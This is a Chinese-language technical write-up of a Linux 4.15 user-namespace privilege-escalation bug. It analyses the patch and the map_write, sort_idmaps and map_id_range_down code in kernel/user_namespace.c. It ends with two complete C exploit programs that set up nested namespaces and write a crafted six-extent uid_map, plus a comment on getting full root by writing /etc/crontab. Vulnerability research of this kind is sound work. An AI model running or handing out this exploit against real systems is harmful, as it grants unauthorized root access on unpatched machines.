简介
这是名称空间的漏洞,文章先介绍user namespaces的简单只是,然后从补丁入手,分析源码,找到漏洞出现的原因。因为对这块的源码不是那么熟悉,所以着重描述源码分析的部分,其他可以参考末尾的链接
本文出现的代码都基于linux-4.15.4
namespace
linux中有实现名称空间,用来隔离不同的资源,实现原理就是将原本是全局的变量放到各个namespaces之中去。
user namespaces
linux中user namespaces的man说明:overview of Linux user namespaces
user namespaces是linux中用来隔离与安全相关的标志符和属性的名称空间,主要包括UID、GID、根目录、秘钥和capacity。在名称空间中,user namespaces可以实现进程和名称空间中有不同的uid和gid,比如名称空间中可以有root权限而在真实系统中没有。
在上面的main说明中可以看到两个proc文件: /proc/<pid>/uid_map 和 /proc/<pid>/gid_map。向这个文件写入值可以用来将系统中的uid或gid映射到namespaces中去。其中:
- 第一个字段ID-inside-ns表示在容器显示的UID或GID,
- 第二个字段ID-outside-ns表示容器外映射的真实的UID或GID。
- 第三个字段表示映射的范围,一般填1,表示一一对应。
比如,把真实的uid=1000映射成容器内的uid=0
$
cat
/proc/2465/uid_map
0 1000 1
- 写这两个文件的进程需要这个namespace中的CAP_SETUID (CAP_SETGID)权限(可参看Capabilities)
- 写入的进程必须是此user namespace的父或子的user namespace进程。
- 另外需要满如下条件之一:1)父进程将effective uid/gid映射到子进程的user namespace中,2)父进程如果有CAP_SETUID/CAP_SETGID权限,那么它将可以映射到父进程中的任一uid/gid。
补丁分析
这个漏洞的修补在这里,问题出在kernel/user_namespace.c中的map_write之中:
diff --git a/kernel/user_namespace.c b/kernel/user_namespace.c index e5222b5..923414a 100644 --- a/kernel/user_namespace.c +++ b/kernel/user_namespace.c @@ -974,10 +974,6 @@ static ssize_t map_write(struct file *file, const char __user *buf, if (!new_idmap_permitted(file, ns, cap_setid, &new_map)) goto out; - ret = sort_idmaps(&new_map); - if (ret < 0) - goto out; - ret = -EPERM; /* Map the lower ids from the parent user namespace to the * kernel global id space. @@ -1004,6 +1000,14 @@ static ssize_t map_write(struct file *file, const char __user *buf, e->lower_first = lower_first; } + /* + * If we want to use binary search for lookup, this clones the extent + * array and sorts both copies. + */ + ret = sort_idmaps(&new_map); + if (ret < 0) + goto out; + /* Install the map */ if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) { memcpy(map->extent, new_map.extent,
只是调换了几行代码的位置,先不着急,分析一下这个函数。
在understand中,找出这个函数的调用流程图:
然后去看看调用map_write的函数proc_uid_map_write,函数原型:
ssize_t proc_uid_map_write(struct file *file, const char __user *buf, size_t size, loff_t *ppos)
参数很像文件描述符的写操作函数,在寻找源码中和该函数相关的操作,发现在fs/proc/base.c之中有这样一个结构用到了proc_uid_map_write:
static const struct file_operations proc_uid_map_operations = { .open = proc_uid_map_open, .write = proc_uid_map_write, .read = seq_read, .llseek = seq_lseek, .release = proc_id_map_release, };
确认是文件的操作,接着在这个文件中,还有下面的代码
REG("uid_map", S_IRUGO|S_IWUSR, proc_uid_map_operations)
所以,推测这就是 /proc/<pid>/uid_map文件写操作的实现
源代码分析
接着回到漏洞源代码,开始分析,先从proc_uid_map_write函数开始,也就是文件写操作的第一个函数
ssize_t proc_uid_map_write(struct file *file, const char __user *buf, size_t size, loff_t *ppos) { struct seq_file *seq = file->private_data; struct user_namespace *ns = seq->private; struct user_namespace *seq_ns = seq_user_ns(seq); if (!ns->parent) return -EPERM; if ((seq_ns != ns) && (seq_ns != ns->parent)) return -EPERM; return map_write(file, buf, size, ppos, CAP_SETUID, &ns->uid_map, &ns->parent->uid_map); }
看到只是做了两个检查,然后调用了map_write函数,而map_write函数的后两个参数分别为名称空间的uid_map和父名称空间的uid_map(由名称空间的知识可以知道,名称空间的新建是需要clone处新进程,传入特定参数来创建新的名称空间)
看看这些个map的定义,看到uid_gid_extent的定义正好是符合 /proc/<pid>/uid_map等的文件格式,而且在user_naspace的man手册中写道,这些文件一次能写入多个值,在Linux中4.14之前,这个极限被(任意地)设为5行。从Linux 4.15,限制是340行。这样下面这两个结构就不难理解了,当数据行数在5之内的时候,直接写在extent里面,当大于5的时候,放在forward指向的位置:
#define UID_GID_MAP_MAX_BASE_EXTENTS 5
#define UID_GID_MAP_MAX_EXTENTS 340
struct uid_gid_extent { u32 first; u32 lower_first; u32 count; }; struct uid_gid_map { /* 64 bytes -- 1 cache line */ u32 nr_extents; union { struct uid_gid_extent extent[UID_GID_MAP_MAX_BASE_EXTENTS]; struct { struct uid_gid_extent *forward; struct uid_gid_extent *reverse; }; }; };
看map_write的源码的第一部分,比较好理解了,capacity相关的含义对照man手册中的解释,除去几个参数判断的位置,比较重要的就是kbuf这块内存,调用了memdup_user_nul函数先在内核中分配了一块内存,然后将用户态写入的数据复制到内核之中,最后这块内存由kbuf指向
struct seq_file *seq = file->private_data; struct user_namespace *ns = seq->private; struct uid_gid_map new_map; unsigned idx; struct uid_gid_extent extent; char *kbuf = NULL, *pos, *next_line; ssize_t ret = -EINVAL; memset(&new_map, 0, sizeof(struct uid_gid_map)); ret = -EPERM; /* Only allow one successful write to the map */ if (map->nr_extents != 0) goto out; /* * Adjusting namespace settings requires capabilities on the target. */ if (cap_valid(cap_setid) && !file_ns_capable(file, ns, CAP_SYS_ADMIN)) goto out; /* Only allow < page size writes at the beginning of the file */ ret = -EINVAL; if ((*ppos != 0) || (count >= PAGE_SIZE)) goto out; /* Slurp in the user data */ //从用户空间复制写入的数据到kbuf kbuf = memdup_user_nul(buf, count); if (IS_ERR(kbuf)) { ret = PTR_ERR(kbuf); kbuf = NULL; goto out; } /* Parse the user data */ ret = -EINVAL; pos = kbuf;
接着看,有一个大循环,不断的按行解析出用户输入数据,存放进extent中,然后调用了两个比较关键的函数,mappings_overlap和insert_extent,mappings_overlap用来检测uid_gid_extent和uid_gid_map有没有重叠的部分,有返回true,insert_extent用来向uid_gid_map中插入一个uid_gid_extent。
for (; pos; pos = next_line) { /* Find the end of line and ensure I don't look past it */ next_line = strchr(pos, '\n'); if (next_line) { *next_line = '\0'; next_line++; if (*next_line == '\0') next_line = NULL; } pos = skip_spaces(pos); extent.first = simple_strtoul(pos, &pos, 10); if (!isspace(*pos)) goto out; pos = skip_spaces(pos); extent.lower_first = simple_strtoul(pos, &pos, 10); if (!isspace(*pos)) goto out; pos = skip_spaces(pos); extent.count = simple_strtoul(pos, &pos, 10); if (*pos && !isspace(*pos)) goto out; /* Verify there is not trailing junk on the line */ pos = skip_spaces(pos); if (*pos != '\0') goto out; /* Verify we have been given valid starting values */ if ((extent.first == (u32) -1) || (extent.lower_first == (u32) -1)) goto out; /* Verify count is not zero and does not cause the * extent to wrap */ if ((extent.first + extent.count) <= extent.first) goto out; if ((extent.lower_first + extent.count) <= extent.lower_first) goto out; /* Do the ranges in extent overlap any previous extents? */ if (mappings_overlap(&new_map, &extent)) goto out; if ((new_map.nr_extents + 1) == UID_GID_MAP_MAX_EXTENTS && (next_line != NULL)) goto out; ret = insert_extent(&new_map, &extent); if (ret < 0) goto out; ret = -EINVAL; }
看看这上面说到的两个关键函数的实现,mappings_overlap函数中,遍历uid_gid_map,取出每个uid_gid_extent,然后和extent进行比较,包括区间的上界和下届,同时可以看到当nr_extent大于5的时候,会指向forword指向的uid_gid_extent
static bool mappings_overlap(struct uid_gid_map *new_map, struct uid_gid_extent *extent) { u32 upper_first, lower_first, upper_last, lower_last; unsigned idx; upper_first = extent->first; lower_first = extent->lower_first; upper_last = upper_first + extent->count - 1; lower_last = lower_first + extent->count - 1; for (idx = 0; idx < new_map->nr_extents; idx++) { u32 prev_upper_first, prev_lower_first; u32 prev_upper_last, prev_lower_last; struct uid_gid_extent *prev; if (new_map->nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) prev = &new_map->extent[idx]; else prev = &new_map->forward[idx]; prev_upper_first = prev->first; prev_lower_first = prev->lower_first; prev_upper_last = prev_upper_first + prev->count - 1; prev_lower_last = prev_lower_first + prev->count - 1; /* Does the upper range intersect a previous extent? */ if ((prev_upper_first <= upper_last) && (prev_upper_last >= upper_first)) return true; /* Does the lower range intersect a previous extent? */ if ((prev_lower_first <= lower_last) && (prev_lower_last >= lower_first)) return true; } return false; }
好了,接着看insert_extent函数,可以看出一个大的if条件,当插入操作进行到末尾的时候,会分配一块340的内存,然后将拷贝的目的地址设置为forward指向的位置,接着nr_extent增加
static int insert_extent(struct uid_gid_map *map, struct uid_gid_extent *extent) { struct uid_gid_extent *dest; if (map->nr_extents == UID_GID_MAP_MAX_BASE_EXTENTS) { struct uid_gid_extent *forward; /* Allocate memory for 340 mappings. */ forward = kmalloc(sizeof(struct uid_gid_extent) * UID_GID_MAP_MAX_EXTENTS, GFP_KERNEL); if (!forward) return -ENOMEM; /* Copy over memory. Only set up memory for the forward pointer. * Defer the memory setup for the reverse pointer. */ memcpy(forward, map->extent, map->nr_extents * sizeof(map->extent[0])); map->forward = forward; map->reverse = NULL; } if (map->nr_extents < UID_GID_MAP_MAX_BASE_EXTENTS) dest = &map->extent[map->nr_extents]; else dest = &map->forward[map->nr_extents]; *dest = *extent; map->nr_extents++; return 0; }
下面回到map_write函数,之前的操作都是用来复制输入数据,做一些检查工作,最终的输入数据被放在了new_map中,new_idmap_permitted就不看了,可以对照usernamespaces的capacity来进行理解,接下来的函数是sort_idmaps函数
if (new_map.nr_extents == 0) goto out; ret = -EPERM; /* Validate the user is allowed to use user id's mapped to. */ if (!new_idmap_permitted(file, ns, cap_setid, &new_map)) goto out; ret = sort_idmaps(&new_map); if (ret < 0) goto out;
sort_idmaps函数,这是一个排序函数,并且只有当只排序大于5的部分,同时kmemdup函数还复制了一份,进行了你想排序,将结果放在reverse处,从上面的函数能考到这个值被初始化为NULL
static int sort_idmaps(struct uid_gid_map *map) { if (map->nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) return 0; /* Sort forward array. */ sort(map->forward, map->nr_extents, sizeof(struct uid_gid_extent), cmp_extents_forward, NULL); /* Only copy the memory from forward we actually need. */ map->reverse = kmemdup(map->forward, map->nr_extents * sizeof(struct uid_gid_extent), GFP_KERNEL); if (!map->reverse) return -ENOMEM; /* Sort reverse array. */ sort(map->reverse, map->nr_extents, sizeof(struct uid_gid_extent), cmp_extents_reverse, NULL); return 0; }
然后从map_write函数,遍历了输入数据,调用了map_id_range_down函数,这个函数的参数1是map_write接受的参数表示父名称空间的uid_gid_map,参数23表示写入数据的第23项,也就是映射父名称空间的其实位置和范围
/* Map the lower ids from the parent user namespace to the * kernel global id space. */ for (idx = 0; idx < new_map.nr_extents; idx++) { struct uid_gid_extent *e; u32 lower_first; if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) e = &new_map.extent[idx]; else e = &new_map.forward[idx]; lower_first = map_id_range_down(parent_map, e->lower_first, e->count); /* Fail if we can not map the specified extent to * the kernel global id space. */ if (lower_first == (u32) -1) goto out; e->lower_first = lower_first; }
好,接着看map_id_range_down
static u32 map_id_range_down(struct uid_gid_map *map, u32 id, u32 count) { struct uid_gid_extent *extent; unsigned extents = map->nr_extents; smp_rmb(); if (extents <= UID_GID_MAP_MAX_BASE_EXTENTS) extent = map_id_range_down_base(extents, map, id, count); else extent = map_id_range_down_max(extents, map, id, count); /* Map the id or note failure */ if (extent) id = (id - extent->first) + extent->lower_first; else id = (u32) -1; return id; }
直接调用的map_id_range_down_max,是一个二分搜索的封装,回顾用户输入数据,第2个参数表示要映射的父名称空间的起始位置,这个函数使用二分搜索,在父名称空间中找一个uid_gid_extent,而这个uid_gid_extent的[first,first+count-1]包含了子名称空间想映射的区间。
/** * map_id_range_down_max - Find idmap via binary search in ordered idmap array. * Can only be called if number of mappings exceeds UID_GID_MAP_MAX_BASE_EXTENTS. */ static struct uid_gid_extent * map_id_range_down_max(unsigned extents, struct uid_gid_map *map, u32 id, u32 count) { struct idmap_key key; key.map_up = false; key.count = count; key.id = id; return bsearch(&key, map->forward, extents, sizeof(struct uid_gid_extent), cmp_map_id); }
回到map_id_range_down函数,取得这个uid_gid_extent之后,利用这个uid_gid_extent区更新了id并且返回,向前看,可以知道这个id是子名称空间中uid_gid_extent的lower_first字段,也就是想映射的父名称空间的起始位置。下面这句话将id的值更新位父名称空间的父名称空间的位置,由于所有的名称空间都是由一个根名称空间,一步一步嵌套下来,所以这和值最终代表的是整个系统中的uid值。
id = (id - extent->first) + extent->lower_first;
最后,回到map_write函数中,for循环的最后利用下面的语句更新了new_map中对应uid_gid_extent的lower_first字段
e->lower_first = lower_first;
map_write还剩下最后一部分,这部分就类似于写回,map_write传入了一个参数为map,从proc_uid_map_write函数可以知道这是当前名称空间的uid_gid_map,new_map是新建的,这部分的工作就是将new_map写回到map中(这个proc文件只能被写入一次,并且初始的时候是空的)。最后做了一些错误处理。
/* Install the map */ if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) { memcpy(map->extent, new_map.extent, new_map.nr_extents * sizeof(new_map.extent[0])); } else { map->forward = new_map.forward; map->reverse = new_map.reverse; } smp_wmb(); map->nr_extents = new_map.nr_extents; *ppos = count; ret = count; out: if (ret < 0 && new_map.nr_extents > UID_GID_MAP_MAX_BASE_EXTENTS) { kfree(new_map.forward); kfree(new_map.reverse); map->forward = NULL; map->reverse = NULL; map->nr_extents = 0; } mutex_unlock(&userns_state_mutex); kfree(kbuf); return ret;
漏洞分析
前面的sort_idmaps函数中,可以看到当数据数目大于5的时候,还创建了一个reverse的副本,然后进行了排序,然后就没有更改过了,最后将这个内存地址赋值给了map。
来看看两个排序方式的区别
static int cmp_extents_forward(const void *a, const void *b) { const struct uid_gid_extent *e1 = a; const struct uid_gid_extent *e2 = b; if (e1->first < e2->first) return -1; if (e1->first > e2->first) return 1; return 0; } /* cmp function to sort() reverse mappings */ static int cmp_extents_reverse(const void *a, const void *b) { const struct uid_gid_extent *e1 = a; const struct uid_gid_extent *e2 = b; if (e1->lower_first < e2->lower_first) return -1; if (e1->lower_first > e2->lower_first) return 1; return 0; }
forward是用uid_gid_map中uid_gid_extent的first字段来进行排序,而reverse是利用lower_first字段进行排序
在前面调用map_id_range_down的for循环中,更新了e->lower_first的值,而e是通过forward来找到的,所以说最终只是更新了forward中的值,而reverse中的值没有被更改,所以说这个reverse中的值是用户传进来的,如果先有一个名称空间n1,映射自己的root进程到kernel的普通进程,然后n1再创建一个名称空间n2,而将n1的root权限映射到n2的root权限,这样在n2中的uid_map中,forword指向的uid_gid_extent的第2项被更改了,但是forword指向的没有被更改,还保持root到root的映射,所以通过这个reverse来判断的uid就会出现权限提升了。
然后就是这个reverse的链表到底在哪里被用到,并且是用来干嘛的?
根据作者的介绍,在user_namespaces中对reverse这个变量的引用,可以知道直接利用的函数在from_kuid()中,被kuid_has_mapping()判断是否被映射,后者接着又被类似于inode_owner_or_capable()
和 privileged_wrt_inode_uidgid()
这样的权限检查函数所使用。利用代码
最后附上漏洞利用的代码,第一部分是subuid_shell.c,这是一个普通的unshare函数来创建一个新的名空间,主要流程如下:
1、父进程fork子进程,之后子进程等待,父进程调用unshare创建一个新的名称空间
2、父进程创建新的名称空间后等待,子进程写入uid_map等文件,设立映射条件
3、子进程等待,父进程调用sh
#define _GNU_SOURCE #include <err.h> #include <fcntl.h> #include <grp.h> #include <sched.h> #include <signal.h> #include <stdio.h> #include <stdlib.h> #include <sys/prctl.h> #include <sys/socket.h> #include <sys/un.h> #include <sys/wait.h> #include <unistd.h> int main(void) { int sync_pipe[2]; char dummy; if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) err(1, "pipe"); pid_t child = fork(); if (child == -1) err(1, "fork"); if (child == 0) { // kill child if parent dies prctl(PR_SET_PDEATHSIG, SIGKILL); close(sync_pipe[1]); // create new ns if (unshare(CLONE_NEWUSER)) err(1, "unshare userns"); if (write(sync_pipe[0], "X", 1) != 1) err(1, "write to sock"); if (read(sync_pipe[0], &dummy, 1) != 1) err(1, "read from sock"); // set uid and gid to 0, in child ns if (setgid(0)) err(1, "setgid"); if (setuid(0)) err(1, "setuid"); // replace process with bash shell, in which you will see "root", // as the setuid(0) call worked // this might seem a little confusing, but you are "root" only to this child ns, // thus, no permission to the outside ns execl("/bin/bash", "bash", NULL); err(1, "exec"); } close(sync_pipe[0]); if (read(sync_pipe[1], &dummy, 1) != 1) err(1, "read from sock"); // set id mapping (0..1000) for child process char cmd[1000]; sprintf(cmd, "echo deny > /proc/%d/setgroups", (int)child); if (system(cmd)) errx(1, "denying setgroups failed"); sprintf(cmd, "newuidmap %d 0 100000 1000", (int)child); if (system(cmd)) errx(1, "newuidmap failed"); sprintf(cmd, "newgidmap %d 0 100000 1000", (int)child); if (system(cmd)) errx(1, "newgidmap failed"); if (write(sync_pipe[1], "X", 1) != 1) err(1, "write to sock"); int status; if (wait(&status) != child) err(1, "wait"); return 0; }
然后是subshell.c函数,主要流程同上,只是子进程写入映射的数据不同,为什么是这些数据可以参考前面的漏洞分析部分
#define _GNU_SOURCE #include <err.h> #include <fcntl.h> #include <grp.h> #include <sched.h> #include <stdio.h> #include <sys/socket.h> #include <sys/un.h> #include <sys/wait.h> #include <unistd.h> int main(void) { int sync_pipe[2]; char dummy; if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) err(1, "pipe"); // create a child process pid_t child = fork(); if (child == -1) err(1, "fork"); if (child == 0) { // in child process close(sync_pipe[1]); // this creates a new ns if (unshare(CLONE_NEWUSER)) err(1, "unshare userns"); if (write(sync_pipe[0], "X", 1) != 1) err(1, "write to sock"); if (read(sync_pipe[0], &dummy, 1) != 1) err(1, "read from sock"); // start a bash process (replace process image) // this time you are actually root, without the name/id, though // technically the root access is not complete, // to get complete root, write to /etc/crontab and wait for a root shell to pop up execl("/bin/bash", "bash", NULL); err(1, "exec"); } close(sync_pipe[0]); if (read(sync_pipe[1], &dummy, 1) != 1) err(1, "read from sock"); char pbuf[100]; // path of uid_map sprintf(pbuf, "/proc/%d", (int)child); // cd to /proc/pid/uid_map if (chdir(pbuf)) err(1, "chdir"); // our new id mapping with 6 extents (> 5 extents) const char* id_mapping = "0 0 1\n1 1 1\n2 2 1\n3 3 1\n4 4 1\n5 5 995\n"; // write the new mapping to uid_map and gid_map int uid_map = open("uid_map", O_WRONLY); if (uid_map == -1) err(1, "open uid map"); if (write(uid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) err(1, "write uid map"); close(uid_map); int gid_map = open("gid_map", O_WRONLY); if (gid_map == -1) err(1, "open gid map"); if (write(gid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) err(1, "write gid map"); close(gid_map); if (write(sync_pipe[1], "X", 1) != 1) err(1, "write to sock"); int status; if (wait(&status) != child) err(1, "wait"); return 0; }